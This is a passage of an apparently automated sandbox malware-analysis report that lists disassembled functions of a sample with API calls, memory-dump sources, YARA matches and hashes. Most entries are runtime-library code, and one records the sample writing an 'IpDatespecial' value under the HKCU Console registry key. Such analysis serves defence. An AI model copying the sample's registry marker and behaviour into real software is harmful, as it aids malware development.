                                                                                                                            • Instruction Fuzzy Hash: C301C875641310BBE324B7A4AC0EFAB3A6CEB09B21F201614F725E61CCD7B06810C779
                                                                                                                            Function 02C397E2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,02C47C00,00000008,02C398EA,00000000,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C), ref: 02C397F3
                                                                                                                            • __lock.LIBCMT ref: 02C39827
                                                                                                                              • Part of subcall function 02C3C144: __mtinitlocknum.LIBCMT ref: 02C3C15A
                                                                                                                              • Part of subcall function 02C3C144: __amsg_exit.LIBCMT ref: 02C3C166
                                                                                                                              • Part of subcall function 02C3C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,02C399BA,0000000D,02C47C28,00000008,02C39AB1,00000000,?,02C37711,00000000,02C47B60,00000008,02C37776,?), ref: 02C3C16E
                                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02C39834
                                                                                                                            • __lock.LIBCMT ref: 02C39848
                                                                                                                            • ___addlocaleref.LIBCMT ref: 02C39866
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID: KERNEL32.DLL
                                                                                                                            • API String ID: 637971194-2576044830
                                                                                                                            • Opcode ID: 3122cf7580037f47bbb88e2317074caacb6f50f6fd074489454bbaff26c37a53
                                                                                                                            • Instruction ID: becf05c07082aa7dbd0bf336bad969d0abb9eacbad35154c7059dbab4c9130ab
                                                                                                                            • Opcode Fuzzy Hash: 3122cf7580037f47bbb88e2317074caacb6f50f6fd074489454bbaff26c37a53
                                                                                                                            • Instruction Fuzzy Hash: F90180B1844B009FE721AFA9D84574AFBF1AF90324F108E4ED49697290CBB4A644EF55
                                                                                                                            Function 03633D2E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03646318,00000008,03633E36,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C), ref: 03633D3F
                                                                                                                            • __lock.LIBCMT ref: 03633D73
                                                                                                                              • Part of subcall function 03638E5B: __mtinitlocknum.LIBCMT ref: 03638E71
                                                                                                                              • Part of subcall function 03638E5B: __amsg_exit.LIBCMT ref: 03638E7D
                                                                                                                              • Part of subcall function 03638E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03633F06,0000000D,03646340,00000008,03633FFF,00000000,?,036310F0,00000000,03646278,00000008,03631155,?), ref: 03638E85
                                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 03633D80
                                                                                                                            • __lock.LIBCMT ref: 03633D94
                                                                                                                            • ___addlocaleref.LIBCMT ref: 03633DB2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID: KERNEL32.DLL
                                                                                                                            • API String ID: 637971194-2576044830
                                                                                                                            • Opcode ID: cebd250386fac31426618e0573b50ac12728a4a50d751cedd280ec251bd04312
                                                                                                                            • Instruction ID: 09b321de18b9b0cb8d391768a4d0aed789d30d240044739fe9bf144406ea6fdc
                                                                                                                            • Opcode Fuzzy Hash: cebd250386fac31426618e0573b50ac12728a4a50d751cedd280ec251bd04312
                                                                                                                            • Instruction Fuzzy Hash: E0019279941700EFD720EF7AD80478AFBE0AF41710F20990EE49A5B7A0CBB4A644CF19
                                                                                                                            Function 0362B78C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0362B7A7
                                                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0362B7B7
                                                                                                                            • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 0362B7CE
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000004), ref: 0362B7D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$CloseDeleteOpen
                                                                                                                            • String ID: Console$IpDatespecial
                                                                                                                            • API String ID: 3183427449-1840232981
                                                                                                                            • Opcode ID: 7aaeb1b057c4df023b4bab82d51249c803411942a6d80e226e1b1c7fe0529ba8
                                                                                                                            • Instruction ID: e60687abbc57de00914dc5ad123536303e8840a2907c771d976e480f420f25d1
                                                                                                                            • Opcode Fuzzy Hash: 7aaeb1b057c4df023b4bab82d51249c803411942a6d80e226e1b1c7fe0529ba8
                                                                                                                            • Instruction Fuzzy Hash: 66F0A775B44340FFD324A7A0AC5FF5AB794FB89B01F604A0DF78565185C761A500C666
                                                                                                                            Function 02C433F1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 02C43412
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                            • __getptd.LIBCMT ref: 02C43423
                                                                                                                            • __getptd.LIBCMT ref: 02C43431
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                            • API String ID: 803148776-2671469338
                                                                                                                            • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                            • Instruction ID: 1196a29347a39d748df400a2594f3b1f176478f8582e4773ddbcf11d5ee10ec9
                                                                                                                            • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                            • Instruction Fuzzy Hash: 95E012305042488EC7119768C0497E936E5FBC4314FA918E1D41DCB222CB79EA50D943
                                                                                                                            Function 036402FC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 0364031D
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                            • __getptd.LIBCMT ref: 0364032E
                                                                                                                            • __getptd.LIBCMT ref: 0364033C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                            • API String ID: 803148776-2671469338
                                                                                                                            • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                            • Instruction ID: 1a7043f1dfeacb19929bc6fa3d17746d9139e3521775919002f8ab3f6bc7100c
                                                                                                                            • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                            • Instruction Fuzzy Hash: DEE01238900215CFD720D768C14ABA87BD9BB45714F6904AAD50CCF321D738E4908686
                                                                                                                            Function 03629C30 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 03629C3F
                                                                                                                              • Part of subcall function 0362F673: __FF_MSGBANNER.LIBCMT ref: 0362F68C
                                                                                                                              • Part of subcall function 0362F673: __NMSG_WRITE.LIBCMT ref: 0362F693
                                                                                                                              • Part of subcall function 0362F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F6B8
                                                                                                                            • _free.LIBCMT ref: 03629C63
                                                                                                                            • _memset.LIBCMT ref: 03629CBB
                                                                                                                              • Part of subcall function 0362A610: GetObjectW.GDI32(?,00000054,?), ref: 0362A62E
                                                                                                                            • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 03629CD3
                                                                                                                            • _free.LIBCMT ref: 03629CE4
                                                                                                                            • _free.LIBCMT ref: 03629D23
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1756752955-0
                                                                                                                            • Opcode ID: 81b0d8c64a70d7a8a7cd30dbc33beddc2e6bca8769d1193a80f3ad3de64a6dbd
                                                                                                                            • Instruction ID: d4f2e1227363c3d869e3c16728f544048c6eb8c85e52f4e26e79f12e5b5e3801
                                                                                                                            • Opcode Fuzzy Hash: 81b0d8c64a70d7a8a7cd30dbc33beddc2e6bca8769d1193a80f3ad3de64a6dbd
                                                                                                                            • Instruction Fuzzy Hash: 0E31B0B2600B266BE300DF25D980B56BBE8FB8A310F05853AD9098B741E7B0E464CF94
                                                                                                                            Function 02C35060 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(000002FF), ref: 02C350AA
                                                                                                                            • WSASetLastError.WS2_32(0000139F), ref: 02C350C2
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 02C350CC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4082018349-0
                                                                                                                            • Opcode ID: 768ded3e01b0f19f937499c9e44ef2cfb33578fb526ead1bbfb432bc07f8ce91
                                                                                                                            • Instruction ID: 6723d56eeecc66007c41840d8557bfd524b5609a5689a13d592a72990cf66031
                                                                                                                            • Opcode Fuzzy Hash: 768ded3e01b0f19f937499c9e44ef2cfb33578fb526ead1bbfb432bc07f8ce91
                                                                                                                            • Instruction Fuzzy Hash: 3B31CB7AA04644ABD721CFA4ED85B6BB3E9FB48750F404A1AFD06C7680D736A810CB90
                                                                                                                            Function 03625080 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(000002FF), ref: 036250CA
                                                                                                                            • WSASetLastError.WS2_32(0000139F), ref: 036250E2
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 036250EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4082018349-0
                                                                                                                            • Opcode ID: a74de6e74f6ffbb007594da9eb71fb7b2fb4df6890637a3ca2ae5332c2b7816e
                                                                                                                            • Instruction ID: 53cde7ae613f3d5d95dd2deee779a7d65d21484aaf9f16a798dee1969d017690
                                                                                                                            • Opcode Fuzzy Hash: a74de6e74f6ffbb007594da9eb71fb7b2fb4df6890637a3ca2ae5332c2b7816e
                                                                                                                            • Instruction Fuzzy Hash: 9831AE7AA04B08ABD720DF95D945B6BBBE8FB49710F10495EF916C7780E736A800CB54
                                                                                                                            Function 02C3485A Relevance: 9.1, APIs: 6, Instructions: 91sleepsynchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C348E1
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C348EC
                                                                                                                            • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C348F9
                                                                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C34914
                                                                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C3491D
                                                                                                                            • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C3492E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 640476663-0
                                                                                                                            • Opcode ID: 06853faa616a761b6414d5b5694ce31fbb8eb477af54c74793bad7c08a49a785
                                                                                                                            • Instruction ID: 2406aa996f9a146fbdf7297624858b0be1754323c133a31fc8fc96b9baad4110
                                                                                                                            • Opcode Fuzzy Hash: 06853faa616a761b6414d5b5694ce31fbb8eb477af54c74793bad7c08a49a785
                                                                                                                            • Instruction Fuzzy Hash: A12148761042849BC715EBA8DC48A87F3F9FF993547544F08E554C7285C634A805CFE0
                                                                                                                            Function 02C436A3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 02C436CB
                                                                                                                              • Part of subcall function 02C4325B: __getptd.LIBCMT ref: 02C43269
                                                                                                                              • Part of subcall function 02C4325B: __getptd.LIBCMT ref: 02C43277
                                                                                                                            • __getptd.LIBCMT ref: 02C436D5
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                            • __getptd.LIBCMT ref: 02C436E3
                                                                                                                            • __getptd.LIBCMT ref: 02C436F1
                                                                                                                            • __getptd.LIBCMT ref: 02C436FC
                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 02C43722
                                                                                                                              • Part of subcall function 02C43300: __CallSettingFrame@12.LIBCMT ref: 02C4334C
                                                                                                                              • Part of subcall function 02C437C9: __getptd.LIBCMT ref: 02C437D8
                                                                                                                              • Part of subcall function 02C437C9: __getptd.LIBCMT ref: 02C437E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1602911419-0
                                                                                                                            • Opcode ID: 081196c110454321d6a219b30e4b85e320d4327fa3d5f056476df268cc808128
                                                                                                                            • Instruction ID: 985573c747d494be6e302802866f7fb8bc8b8b95a6747894ac8c361be7614d7f
                                                                                                                            • Opcode Fuzzy Hash: 081196c110454321d6a219b30e4b85e320d4327fa3d5f056476df268cc808128
                                                                                                                            • Instruction Fuzzy Hash: AD1107B1C00309DFDB01EFA4D545AEE7BB2FF44314F1084A9E868A7250DB799A11EF50
                                                                                                                            Function 036405AE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 036405D6
                                                                                                                              • Part of subcall function 036400B7: __getptd.LIBCMT ref: 036400C5
                                                                                                                              • Part of subcall function 036400B7: __getptd.LIBCMT ref: 036400D3
                                                                                                                            • __getptd.LIBCMT ref: 036405E0
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                            • __getptd.LIBCMT ref: 036405EE
                                                                                                                            • __getptd.LIBCMT ref: 036405FC
                                                                                                                            • __getptd.LIBCMT ref: 03640607
                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 0364062D
                                                                                                                              • Part of subcall function 0364015C: __CallSettingFrame@12.LIBCMT ref: 036401A8
                                                                                                                              • Part of subcall function 036406D4: __getptd.LIBCMT ref: 036406E3
                                                                                                                              • Part of subcall function 036406D4: __getptd.LIBCMT ref: 036406F1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1602911419-0
                                                                                                                            • Opcode ID: c50c07f3756157263ae9b8965d9d1ddf57879161269cecd2bdc0dede5d49b778
                                                                                                                            • Instruction ID: eed8a9c713264f18cefbaca59bce6df878044c93c64a545efa8a37d4ab44629c
                                                                                                                            • Opcode Fuzzy Hash: c50c07f3756157263ae9b8965d9d1ddf57879161269cecd2bdc0dede5d49b778
                                                                                                                            • Instruction Fuzzy Hash: 4111C6B9D01309DFDB10EFA4D484AEDBBB0FF05310F10806AE925AB250DB789A159F54
                                                                                                                            Function 034BFF6D Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 034BFF95
                                                                                                                              • Part of subcall function 034BFA76: __getptd.LIBCMT ref: 034BFA84
                                                                                                                              • Part of subcall function 034BFA76: __getptd.LIBCMT ref: 034BFA92
                                                                                                                            • __getptd.LIBCMT ref: 034BFF9F
                                                                                                                              • Part of subcall function 034B381A: __getptd_noexit.LIBCMT ref: 034B381D
                                                                                                                              • Part of subcall function 034B381A: __amsg_exit.LIBCMT ref: 034B382A
                                                                                                                            • __getptd.LIBCMT ref: 034BFFAD
                                                                                                                            • __getptd.LIBCMT ref: 034BFFBB
                                                                                                                            • __getptd.LIBCMT ref: 034BFFC6
                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 034BFFEC
                                                                                                                              • Part of subcall function 034BFB1B: __CallSettingFrame@12.LIBCMT ref: 034BFB67
                                                                                                                              • Part of subcall function 034C0093: __getptd.LIBCMT ref: 034C00A2
                                                                                                                              • Part of subcall function 034C0093: __getptd.LIBCMT ref: 034C00B0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1602911419-0
                                                                                                                            • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                            • Instruction ID: 223ade8636231cd6fb6b0b1942cd0d4cf463b121821c2ddf02d166496dbe2bb4
                                                                                                                            • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                            • Instruction Fuzzy Hash: 97119479D00309DFDB00EFA6D844AED7BB1FF08314F10846AE814AF250DB399A559F69
                                                                                                                            Function 02C3D9BE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 02C3D9CA
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                            • __amsg_exit.LIBCMT ref: 02C3D9EA
                                                                                                                            • __lock.LIBCMT ref: 02C3D9FA
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02C3DA17
                                                                                                                            • _free.LIBCMT ref: 02C3DA2A
                                                                                                                            • InterlockedIncrement.KERNEL32(02CC1658), ref: 02C3DA42
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3470314060-0
                                                                                                                            • Opcode ID: 642d09fec64462814870dae6058c4ff2984fc05aef899bef19cd659c0f1ba410
                                                                                                                            • Instruction ID: 0f920bd026f9f6958351fa9296e2b6e6a4d1eedb1204f6db304912bde1f37bf1
                                                                                                                            • Opcode Fuzzy Hash: 642d09fec64462814870dae6058c4ff2984fc05aef899bef19cd659c0f1ba410
                                                                                                                            • Instruction Fuzzy Hash: 7A01F576D857219BC723AF64900579FB7A2BF40711F040E05E85267280CF34B661EFD6
                                                                                                                            Function 03634885 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 03634891
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                            • __amsg_exit.LIBCMT ref: 036348B1
                                                                                                                            • __lock.LIBCMT ref: 036348C1
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 036348DE
                                                                                                                            • _free.LIBCMT ref: 036348F1
                                                                                                                            • InterlockedIncrement.KERNEL32(03901658), ref: 03634909
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
